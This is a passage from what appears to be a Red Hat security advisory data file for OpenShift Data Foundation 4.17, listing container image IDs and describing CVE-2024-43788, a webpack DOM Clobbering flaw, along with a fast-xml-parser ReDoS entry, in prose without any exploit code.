"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "fast-xml-parser: ReDOS at currency parsing in currency.js", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", 